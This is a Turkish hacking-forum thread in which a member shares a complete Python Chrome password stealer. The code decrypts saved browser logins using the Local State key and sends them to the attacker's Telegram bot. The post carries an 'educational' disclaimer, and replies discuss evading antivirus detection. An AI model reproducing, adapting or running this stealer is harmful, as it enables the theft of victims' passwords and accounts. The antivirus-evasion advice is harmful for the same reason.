Python ile Chrome Şifrelerini Çalmak!

Mamilate

Mamilate

Üye
12 Kas 2023
236
98
emmi27' Alıntı:
hocam ama illaki güvenlik duvarına falan takınır maalesf şu fud olayı şart
Genişletmek için tıkla ...
Evet, her ne kadar kod olarak takılmasa da exe ye çevirmek için kullandığımız pyinstaller yüzünden illaki takılacak. Yani sen istersen kodunda sadece print hello yazdır ve pyinstaller ile exe ye çevir o zaman da takılacak. O yüzden genellikle bu işler için C ailesinde ki diller tercih ediliyor.
 
bahattinarda

bahattinarda

Üye
16 May 2023
203
57
23
TÜRKİYE CUMHURİYETİ 🇹🇷
Mamilate' Alıntı:

Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.

Daha önceki konularıma şuradan ulaşabilirsiniz:

Python ile Hedefi Deli Etmek!
Python ile RansomWare

NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Chrome Şifre Grabber:
Python: 
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import requests

def encryption_key():
    local_state_yolu = os.path.join(os.environ["USERPROFILE"],
                                    "AppData", "Local", "Google", "Chrome",
                                    "User Data", "Local State")
    with open(local_state_yolu, "r", encoding="utf-8") as f:
        local_state = f.read()
        local_state = json.loads(local_state)

    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    key = key[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]


def decrypt_password(password, key):
    try:
        iv = password[3:15]
        password = password[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return ""


def send_telegram_document(bot_token, chat_id, document_path):
    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
    files = {'document': open(document_path, 'rb')}
    params = {
        "chat_id": chat_id,
    }
    try:
        response = requests.post(url, params=params, files=files)
    except:
        pass


def main():
    key = encryption_key()
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    cursor.execute(
        "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")

    credentials = []
    for row in cursor.fetchall():
        origin_url = row[0]
        action_url = row[1]
        username = row[2]
        password = decrypt_password(row[3], key)
        date_created = row[4]
        date_last_used = row[5]
        if username or password:
            credentials.append({
                "Origin URL": origin_url,
                "Action URL": action_url,
                "Username": username,
                "Password": password
            })

    cursor.close()
    db.close()
    try:
        os.remove(filename)
    except:
        pass

    if credentials:
        bot_token = "BOT TOKENİNİZ"
        chat_id = "CHAT ID NİZ"
        document_path = "credentials.txt"

        with open(document_path, "w") as file:
            json.dump(credentials, file, indent=4)

        send_telegram_document(bot_token, chat_id, document_path)
        os.remove(document_path)


if __name__ == "__main__":
    main()

Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?

agsycx3.png


pj66oqi.png


ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
Genişletmek için tıkla ...
Eline sağlık
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.